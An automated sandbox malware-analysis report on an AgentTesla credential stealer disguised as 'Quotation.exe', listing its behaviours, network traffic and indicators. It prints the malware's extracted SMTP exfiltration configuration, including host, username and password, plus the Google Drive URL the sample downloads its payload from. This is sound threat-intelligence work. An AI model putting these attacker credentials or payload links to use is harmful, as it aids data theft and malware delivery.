Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1548300
MD5:9ed064f0feb2397bb999563751c20b92
SHA1:810d6882ab53614c20950da17021650fed89f5d8
SHA256:f849a928785cb16a719369fbe98c9246bc84d634f3547467a3223fa148a6b09b
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Quotation.exe (PID: 5968 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 9ED064F0FEB2397BB999563751C20B92)
    • Quotation.exe (PID: 2284 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 9ED064F0FEB2397BB999563751C20B92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: Quotation.exe PID: 2284JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 67.23.226.139, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 2284, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49815
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-04T10:00:13.349949+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549704TCP
            2024-11-04T10:00:52.036491+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549888TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-04T10:00:28.263870+010028032702Potentially Bad Traffic192.168.2.549767142.250.186.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Quotation.exe.5968.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
            Source: Quotation.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.5:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: global trafficTCP traffic: 192.168.2.5:49815 -> 67.23.226.139:587
            Source: Joe Sandbox ViewIP Address: 67.23.226.139 67.23.226.139
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49767 -> 142.250.186.174:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49704
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49888
            Source: global trafficTCP traffic: 192.168.2.5:49815 -> 67.23.226.139:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: mail.showpiece.trillennium.biz
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.showpiece.trillennium.biz
            Source: Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://showpiece.trillennium.biz
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3294043978.0000000036424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3293947938.0000000036397000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2469042392.00000000363BB000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3294043978.0000000036424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Quotation.exe, 00000003.00000002.3293340440.0000000033CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: Quotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Quotation.exe, 00000003.00000002.3270442306.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Quotation.exe, 00000003.00000002.3270427395.0000000003800000.00000004.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3270442306.0000000003857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6
            Source: Quotation.exe, 00000003.00000003.2366718942.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.3270442306.0000000003882000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2403781585.0000000003885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Quotation.exe, 00000003.00000002.3270442306.0000000003882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/R
            Source: Quotation.exe, 00000003.00000002.3270442306.0000000003818000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2403781585.0000000003885000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=download
            Source: Quotation.exe, 00000003.00000003.2366718942.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2403781585.0000000003885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=downloadY
            Source: Quotation.exe, 00000003.00000003.2366718942.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2403781585.0000000003885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=downloade
            Source: Quotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Quotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Quotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Quotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Quotation.exe, 00000003.00000003.2357877321.0000000003887000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2357782710.0000000003887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.5:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.5:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49802 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Quotation.exe
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_733F23510_2_733F2351
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_0015A5003_2_0015A500
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_0015A9503_2_0015A950
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00154A983_2_00154A98
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_0015DCA83_2_0015DCA8
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00153E803_2_00153E80
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_001541BE3_2_001541BE
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_001541C83_2_001541C8
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D566983_2_36D56698
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D5B2BA3_2_36D5B2BA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D556483_2_36D55648
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D5C2203_2_36D5C220
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D57E203_2_36D57E20
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D531083_2_36D53108
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D577403_2_36D57740
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D523383_2_36D52338
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D5E4403_2_36D5E440
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D500403_2_36D50040
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D55D833_2_36D55D83
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_3723194A3_2_3723194A
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_372319823_2_37231982
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_372319883_2_37231988
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_373904483_2_37390448
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_37394B483_2_37394B48
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_36D500373_2_36D50037
            Source: Quotation.exeStatic PE information: invalid certificate
            Source: Quotation.exe, 00000003.00000002.3293100848.0000000033AD9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@4/4
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\overlaysJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsh4381.tmpJump to behavior
            Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Quotation.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile written: C:\Users\user\Music\antithetic.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Quotation.exeStatic file information: File size 1208728 > 1048576
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_733F2351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_733F2351
